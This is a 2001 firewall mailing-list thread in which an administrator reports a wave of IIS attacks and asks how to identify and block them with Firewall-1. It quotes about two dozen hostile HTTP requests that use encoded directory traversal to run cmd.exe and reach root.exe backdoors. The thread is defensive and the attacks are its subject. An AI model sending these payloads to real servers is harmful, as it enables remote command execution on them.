RE: [FW1] New worm on the road?

[James Cabe]

checkout www.intrusion.com -----Original Message----- From: Allison, Mark [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 11:05 AM To: 'Patrick Coomans' Cc: '[EMAIL PROTECTED]' Subject: RE: [FW1] New worm on the road? A patch was released from Microsoft in October 2000.  Follow the Symantic link below. http:[EMAIL PROTECTED] Mark Allison Global Cash Access / Central Credit, L.L.C. [702-855-3037      mailto:mallison@central-credit.net] -----Original Message----- From: Patrick Coomans [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:36 PM To: [EMAIL PROTECTED] Subject: [FW1] New worm on the road? Since this evening I am experiencing massive attacks on HTTP (IIS oriented I presume) from many different IP addresses.   They all look like:   GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/root.exe?/c+dir HTTP/1.0 GET /MSADC/root.exe?/c+dir HTTP/1.0 GET /MSADC/root.exe?/c+dir HTTP/1.0 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0   Is anyone aware that this is some new kind of worm? Now my FW1 question: can I create a HTTP resource (secure server) that blocks all requests that e.g. have a .EXE in it ?  Or would that slow my FW1's down to much?   Any other suggestions for good products that can do HTTP content inspection and that cooperate or can co-exist with fw1 ?     Thanks, Patrick   -- This message has been processed by IPM's Messaging Management System (MMS), formerly known as WorldSecure Server, for Viruses & Email Content. It is intended to be viewed only by the individual or entity to whom it is addressed. -- For further information about IPM and the services we offer, please visit our website at www.ipm.com or contact us at (212) 645-5070. -- IPM - If it's remotely possible, we do it!